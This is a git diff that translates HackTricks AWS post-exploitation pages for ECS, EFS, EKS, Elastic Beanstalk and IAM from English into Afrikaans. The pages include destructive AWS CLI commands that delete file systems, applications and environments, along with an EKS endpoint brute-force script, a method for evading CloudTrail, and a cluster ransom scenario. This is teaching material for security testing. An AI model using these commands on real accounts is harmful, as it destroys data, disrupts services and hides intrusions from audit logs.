This is potentially less stealthy but it will **force the tasks to be run in other instances:** - +Die dieselfde tegniek kan gedoen word deur **die EC2-instantie uit die kluster te deregistreer**. Dit is potensieel minder stil, maar dit sal **die take dwing om in ander instanties uitgevoer te word:** ```bash aws ecs deregister-container-instance \ - --cluster --container-instance --force +--cluster --container-instance --force ``` - -A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this: - +'n Finale tegniek om die heruitvoering van take te dwing, is deur aan ECS aan te dui dat die **taak of houer gestop is**. Daar is 3 potensiĂ«le API's om dit te doen: ```bash # Needs: ecs:SubmitTaskStateChange aws ecs submit-task-state-change --cluster \ - --status STOPPED --reason "anything" --containers [...] +--status STOPPED --reason "anything" --containers [...] # Needs: ecs:SubmitContainerStateChange aws ecs submit-container-state-change ... @@ -55,13 +50,8 @@ aws ecs submit-container-state-change ... # Needs: ecs:SubmitAttachmentStateChanges aws ecs submit-attachment-state-changes ... ``` +### Steel sensitiewe inligting uit ECR houers -### Steal sensitive info from ECR containers - -The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them). +Die EC2-instantie sal waarskynlik ook die toestemming `ecr:GetAuthorizationToken` hĂȘ wat dit toelaat om **beelde af te laai** (jy kan sensitiewe inligting daarin soek). {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md index 35b644689..93a0b5d15 100644 
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md @@ -4,7 +4,7 @@ ## EFS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-efs-enum.md 
@@ -12,47 +12,35 @@ For more information check: ### `elasticfilesystem:DeleteMountTarget` -An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target. - +'n Aanvaller kan 'n mount target verwyder, wat moontlik toegang tot die EFS-lĂȘerstelsel vir toepassings en gebruikers wat op daardie mount target staatmaak, kan ontwrig. ```sql aws efs delete-mount-target --mount-target-id ``` - -**Potential Impact**: Disruption of file system access and potential data loss for users or applications. +**PotensiĂ«le Impak**: Ontwrichting van lĂȘerstelsels toegang en potensiĂ«le dataverlies vir gebruikers of toepassings. ### `elasticfilesystem:DeleteFileSystem` -An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system. - +'n Aanvaller kan 'n hele EFS-lĂȘerstelsel verwyder, wat kan lei tot dataverlies en 'n impak op toepassings wat op die lĂȘerstelsel staatmaak. ```perl aws efs delete-file-system --file-system-id ``` - -**Potential Impact**: Data loss and service disruption for applications using the deleted file system. +**PotensiĂ«le Impak**: Gegevensverlies en diensonderbreking vir toepassings wat die verwyderde lĂȘerstelsel gebruik. ### `elasticfilesystem:UpdateFileSystem` -An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion. - +'n Aanvaller kan die EFS-lĂȘerstelsel eienskappe opdateer, soos deurgangmodus, om die prestasie daarvan te beĂŻnvloed of hulpbronuitputting te veroorsaak. ```sql aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps ``` +**PotensiĂ«le Impak**: Afname in lĂȘerstelsels se prestasie of hulpbronuitputting. -**Potential Impact**: Degradation of file system performance or resource exhaustion. 
- -### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint` - -An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system. +### `elasticfilesystem:CreateAccessPoint` en `elasticfilesystem:DeleteAccessPoint` +'n Aanvaller kan toegangspunte skep of verwyder, wat toegangbeheer verander en moontlik onregmatige toegang tot die lĂȘerstelsel aan hulself verleen. ```arduino aws efs create-access-point --file-system-id --posix-user --root-directory aws efs delete-access-point --access-point-id ``` - -**Potential Impact**: Unauthorized access to the file system, data exposure or modification. +**PotensiĂ«le Impak**: Onbevoegde toegang tot die lĂȘerstelsel, data blootstelling of wysiging. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md index eb1f77f46..bcd15110a 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md 
@@ -4,110 +4,101 @@ ## EKS -For mor information check +Vir meer inligting, kyk {{#ref}} ../aws-services/aws-eks-enum.md {{#endref}} -### Enumerate the cluster from the AWS Console +### Enumereer die kluster vanaf die AWS Console -If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)). +As jy die toestemming **`eks:AccessKubernetesApi`** het, kan jy **Kubernetes-objekte** via die AWS EKS-console **bekyk** ([Leer meer](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)). -### Connect to AWS Kubernetes Cluster - -- Easy way: +### Verbinde met AWS Kubernetes Kluster +- Maklike manier: ```bash # Generate kubeconfig aws eks update-kubeconfig --name aws-eks-dev ``` +- Nie so maklik nie: -- Not that easy way: - -If you can **get a token** with **`aws eks get-token --name `** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**. - -In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name): +As jy **'n token kan kry** met **`aws eks get-token --name `** maar jy het nie toestemming om cluster inligting te kry nie (describeCluster), kan jy **jou eie `~/.kube/config` voorberei**. 
Maar, met die token, moet jy steeds die **url eindpunt om te verbind** (as jy daarin geslaag het om 'n JWT token van 'n pod te kry, lees [hier](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) en die **naam van die cluster**. +In my geval, het ek nie die inligting in CloudWatch logs gevind nie, maar ek **het dit in LaunchTemplates userData gevind** en in **EC2 masjiene in userData ook**. Jy kan hierdie inligting maklik in **userData** sien, byvoorbeeld in die volgende voorbeeld (die cluster naam was cluster-name): ```bash API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com /etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false ``` -
-kube config - +kube konfig ```yaml describe-cache-parametersapiVersion: v1 clusters: - - cluster: - certificate-authority-data: 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 - server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com - name: arn:aws:eks:us-east-1::cluster/ +- cluster: +certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com +name: arn:aws:eks:us-east-1::cluster/ contexts: - - context: - cluster: 
arn:aws:eks:us-east-1::cluster/ - user: arn:aws:eks:us-east-1::cluster/ - name: arn:aws:eks:us-east-1::cluster/ +- context: +cluster: arn:aws:eks:us-east-1::cluster/ +user: arn:aws:eks:us-east-1::cluster/ +name: arn:aws:eks:us-east-1::cluster/ current-context: arn:aws:eks:us-east-1::cluster/ kind: Config preferences: {} users: - - name: arn:aws:eks:us-east-1::cluster/ - user: - exec: - apiVersion: client.authentication.k8s.io/v1beta1 - args: - - --region - - us-west-2 - - --profile - - - - eks - - get-token - - --cluster-name - - - command: aws - env: null - interactiveMode: IfAvailable - provideClusterInfo: false +- name: arn:aws:eks:us-east-1::cluster/ +user: +exec: +apiVersion: client.authentication.k8s.io/v1beta1 +args: +- --region +- us-west-2 +- --profile +- +- eks +- get-token +- --cluster-name +- +command: aws +env: null +interactiveMode: IfAvailable +provideClusterInfo: false ``` -
-### From AWS to Kubernetes +### Van AWS na Kubernetes -The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**. +Die **skepper** van die **EKS-kluster** sal **ALTYD** in staat wees om in die kubernetes kluster deel van die groep **`system:masters`** (k8s admin) te kom. Ten tyde van hierdie skrywe is daar **geen direkte manier** om **te vind wie die kluster geskep het** (jy kan CloudTrail nagaan). En daar is **geen manier** om daardie **privilegie** te **verwyder**. -The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**. +Die manier om **toegang tot K8s aan meer AWS IAM gebruikers of rolle** te verleen, is deur die **configmap** **`aws-auth`** te gebruik. > [!WARNING] -> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**. +> Daarom sal enige iemand met **skryftoegang** oor die config map **`aws-auth`** in staat wees om die **hele kluster te kompromitteer**. -For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps). +Vir meer inligting oor hoe om **bykomende privilegies aan IAM rolle & gebruikers** in die **dieselfde of verskillende rekening** te verleen en hoe om dit te **misbruik**, kyk na [**privesc kyk hierdie bladsy**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps). 
-Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**. +Kyk ook na[ **hierdie wonderlike**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **plasing om te leer hoe die authenticatie IAM -> Kubernetes werk**. -### From Kubernetes to AWS +### Van Kubernetes na AWS -It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1). +Dit is moontlik om 'n **OpenID-authenticatie vir kubernetes diensrekening** toe te laat om hulle in staat te stel om rolle in AWS aan te neem. Leer hoe [**dit werk op hierdie bladsy**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1). -### GET Api Server Endpoint from a JWT Token - -Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is +### KRY Api Bediening Eindpunt van 'n JWT Token +Deur die JWT-token te ontcijfer, kry ons die kluster-id & ook die streek. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Weet dat die standaardformaat vir EKS-URL is ```bash https://...eks.amazonaws.com ``` - -Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one: +Nie enige dokumentasie gevind wat die kriteria vir die 'twee karakters' en die 'nommer' verduidelik nie. 
Maar deur 'n paar toetse namens myself te doen, sien ek dat hierdie eene herhaaldelik voorkom: - gr7 - yl4 -Anyway are just 3 chars we can bruteforce them. Use the below script for generating the list - +In elk geval is dit net 3 karakters wat ons kan bruteforce. Gebruik die onderstaande skrip om die lys te genereer. ```python from itertools import product from string import ascii_lowercase 
@@ -116,44 +107,37 @@ letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2) number_combinations = product('0123456789', repeat = 1) result = [ - f'{''.join(comb[0])}{comb[1][0]}' - for comb in product(letter_combinations, number_combinations) +f'{''.join(comb[0])}{comb[1][0]}' +for comb in product(letter_combinations, number_combinations) ] with open('out.txt', 'w') as f: - f.write('\n'.join(result)) +f.write('\n'.join(result)) ``` - -Then with wfuzz - +Dan met wfuzz ```bash wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws.com ``` - > [!WARNING] -> Remember to replace & . +> Onthou om & te vervang. ### Bypass CloudTrail -If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally). +As 'n aanvaller die akrediteer van 'n AWS met **toestemming oor 'n EKS** verkry. As die aanvaller sy eie **`kubeconfig`** (sonder om **`update-kubeconfig`** te noem) soos voorheen verduidelik, genereer die **`get-token`** nie logs in Cloudtrail nie omdat dit nie met die AWS API interaksie het nie (dit skep net die token plaaslik). -So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**. +So wanneer die aanvaller met die EKS-kluster praat, **sal cloudtrail niks log wat verband hou met die gebruiker wat gesteel is en toegang verkry nie**. -Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled). +Let daarop dat die **EKS-kluster dalk logs geaktiveer het** wat hierdie toegang sal log (alhoewel dit standaard gedeaktiveer is). ### EKS Ransom? 
-By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster. +Standaard het die **gebruiker of rol wat 'n kluster geskep het** **ALTYD administratiewe regte** oor die kluster. En dit is die enigste "veilige" toegang wat AWS oor die Kubernetes-kluster sal hĂȘ. -So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**. +So, as 'n **aanvaller 'n kluster met fargate kompromitteer** en **alle ander admins verwyder** en **die AWS gebruiker/rol wat die Kluster geskep het verwyder**, ~~kan die aanvaller die **kluster geĂ«nkripteer het**~~**r**. > [!TIP] -> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster. +> Let daarop dat as die kluster **EC2 VMs** gebruik, dit moontlik kan wees om Admin regte van die **Node** te verkry en die kluster te herstel. > -> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node. +> Trouens, as die kluster Fargate gebruik, kan jy EC2 nodes of alles na EC2 na die kluster skuif en dit herstel deur toegang tot die tokens in die node te verkry. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md index 6267ee02f..4c7810928 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md 
@@ -4,7 +4,7 @@ ## Elastic Beanstalk -For more information: +Vir meer inligting: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md 
@@ -13,72 +13,58 @@ For more information: ### `elasticbeanstalk:DeleteApplicationVersion` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up. +> TODO: Toets of meer toestemmings benodig word hiervoor +'n Aanvaller met die toestemming `elasticbeanstalk:DeleteApplicationVersion` kan **'n bestaande toepassingsweergawe verwyder**. Hierdie aksie kan toepassingsontplooiing pyplyne ontwrig of die verlies van spesifieke toepassingsweergawes veroorsaak as dit nie geback-up is nie. ```bash aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version ``` - -**Potential Impact**: Disruption of application deployment and potential loss of application versions. +**PotensiĂ«le Impak**: Ontwrichting van toepassingsontplooiing en potensiĂ«le verlies van toepassingsweergawe. ### `elasticbeanstalk:TerminateEnvironment` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups. +> TODO: Toets of meer toestemmings benodig word vir dit +'n Aanvaller met die toestemming `elasticbeanstalk:TerminateEnvironment` kan **'n bestaande Elastic Beanstalk-omgewing beĂ«indig**, wat stilstand van die toepassing en potensiĂ«le dataverlies kan veroorsaak as die omgewing nie vir rugsteun geconfigureer is nie. ```bash aws elasticbeanstalk terminate-environment --environment-name my-existing-env ``` - -**Potential Impact**: Downtime of the application, potential data loss, and disruption of services. 
+**PotensiĂ«le Impak**: Stilstand van die toepassing, potensiĂ«le dataverlies, en ontwrigting van dienste. ### `elasticbeanstalk:DeleteApplication` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up. +> TODO: Toets of meer toestemmings benodig word hiervoor +'n Aanvaller met die toestemming `elasticbeanstalk:DeleteApplication` kan **'n hele Elastic Beanstalk-toepassing verwyder**, insluitend al sy weergawes en omgewings. Hierdie aksie kan 'n beduidende verlies aan toepassingshulpbronne en konfigurasies veroorsaak as dit nie geback-up is nie. ```bash aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force ``` - -**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. +**PotensiĂ«le Impak**: Verlies van toepassingshulpbronne, konfigurasies, omgewings en toepassingsweergawe, wat kan lei tot diensonderbreking en potensiĂ«le dataverlies. ### `elasticbeanstalk:SwapEnvironmentCNAMEs` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. +> TODO: Toets of meer toestemmings benodig word vir dit +'n Aanvaller met die `elasticbeanstalk:SwapEnvironmentCNAMEs` toestemming kan **die CNAME-rekords van twee Elastic Beanstalk omgewings omruil**, wat mag veroorsaak dat die verkeerde weergawe van die toepassing aan gebruikers bedien word of lei tot onbedoelde gedrag. 
```bash aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 ``` - -**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. +**PotensiĂ«le Impak**: Om die verkeerde weergawe van die toepassing aan gebruikers te dien of om onbedoelde gedrag in die toepassing te veroorsaak as gevolg van gewisselde omgewings. ### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. +> TODO: Toets of meer toestemmings benodig word vir dit +'n Aanvaller met die `elasticbeanstalk:AddTags` en `elasticbeanstalk:RemoveTags` toestemmings kan **tags op Elastic Beanstalk hulpbronne byvoeg of verwyder**. Hierdie aksie kan lei tot verkeerde hulpbron toewysing, fakturering, of hulpbron bestuur. ```bash aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag ``` - -**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. +**PotensiĂ«le Impak**: Onkorrekte hulpbron toewysing, fakturering, of hulpbron bestuur as gevolg van bygevoegde of verwyderde etikette. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md index f734122e8..9f08ea283 100644 
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md @@ -4,104 +4,90 @@ ## IAM -For more information about IAM access: +Vir meer inligting oor IAM-toegang: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} -## Confused Deputy Problem +## Verwarde Adjunk Probleem -If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. +As jy **'n eksterne rekening (A)** toelaat om toegang te verkry tot 'n **rol** in jou rekening, sal jy waarskynlik **0 sigbaarheid** hĂȘ oor **wie presies toegang tot daardie eksterne rekening kan verkry**. Dit is 'n probleem, want as 'n ander eksterne rekening (B) toegang kan verkry tot die eksterne rekening (A), is dit moontlik dat **B ook toegang tot jou rekening sal hĂȘ**. -Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. +Daarom, wanneer jy 'n eksterne rekening toelaat om toegang te verkry tot 'n rol in jou rekening, is dit moontlik om 'n `ExternalId` te spesifiseer. Dit is 'n "geheime" string wat die eksterne rekening (A) **moet spesifiseer** om **die rol in jou organisasie aan te neem**. Aangesien die **eksterne rekening B nie van hierdie string weet nie**, selfs al het hy toegang tot A, sal hy **nie in staat wees om jou rol te benader nie**.
-However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. - -Example: +Let egter daarop dat hierdie `ExternalId` "geheime" **nie 'n geheim is nie**, enigeen wat die **IAM aanneem rol beleid kan lees, sal dit kan sien**. Maar solank die eksterne rekening A dit weet, maar die eksterne rekening **B dit nie weet nie**, **verhoed dit dat B A misbruik om toegang tot jou rol te verkry**. +Voorbeeld: ```json { - "Version": "2012-10-17", - "Statement": { - "Effect": "Allow", - "Principal": { - "AWS": "Example Corp's AWS Account ID" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "12345" - } - } - } +"Version": "2012-10-17", +"Statement": { +"Effect": "Allow", +"Principal": { +"AWS": "Example Corp's AWS Account ID" +}, +"Action": "sts:AssumeRole", +"Condition": { +"StringEquals": { +"sts:ExternalId": "12345" +} +} +} } ``` - > [!WARNING] -> For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. +> Vir 'n aanvaller om 'n verwarde plaasvervanger te benut, sal hy op een of ander manier moet uitvind of die principals van die huidige rekening rolle in ander rekeninge kan naboots. -### Unexpected Trusts +### Onverwagte Vertroue #### Wildcard as principal - ```json { - "Action": "sts:AssumeRole", - "Effect": "Allow", - "Principal": { "AWS": "*" } +"Action": "sts:AssumeRole", +"Effect": "Allow", +"Principal": { "AWS": "*" } } ``` +Hierdie beleid **laat alle AWS** toe om die rol aan te neem. -This policy **allows all AWS** to assume the role. 
- -#### Service as principal - +#### Diens as hoof ```json { - "Action": "lambda:InvokeFunction", - "Effect": "Allow", - "Principal": { "Service": "apigateway.amazonaws.com" }, - "Resource": "arn:aws:lambda:000000000000:function:foo" +"Action": "lambda:InvokeFunction", +"Effect": "Allow", +"Principal": { "Service": "apigateway.amazonaws.com" }, +"Resource": "arn:aws:lambda:000000000000:function:foo" } ``` +Hierdie beleid **toelaat enige rekening** om hul apigateway te konfigureer om hierdie Lambda aan te roep. -This policy **allows any account** to configure their apigateway to call this Lambda. - -#### S3 as principal - +#### S3 as hoofpersoon ```json "Condition": { "ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, - "StringEquals": { - "aws:SourceAccount": "123456789012" - } +"StringEquals": { +"aws:SourceAccount": "123456789012" +} } ``` +As 'n S3-emmer as 'n hoofpersoon gegee word, omdat S3-emmers nie 'n rekening-ID het nie, as jy **jou emmer verwyder het en die aanvaller dit in hul eie rekening geskep het**, kan hulle dit misbruik. -If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. - -#### Not supported - +#### Nie ondersteun nie ```json { - "Effect": "Allow", - "Principal": { "Service": "cloudtrail.amazonaws.com" }, - "Action": "s3:PutObject", - "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" +"Effect": "Allow", +"Principal": { "Service": "cloudtrail.amazonaws.com" }, +"Action": "s3:PutObject", +"Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" } ``` - -A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). 
+'n Algemene manier om Confused Deputy probleme te vermy, is die gebruik van 'n voorwaarde met `AWS:SourceArn` om die oorsprong ARN te kontroleer. egter, **sommige dienste mag dit nie ondersteun nie** (soos CloudTrail volgens sommige bronne). ## References - [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md index 482af5425..45718b74f 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md 
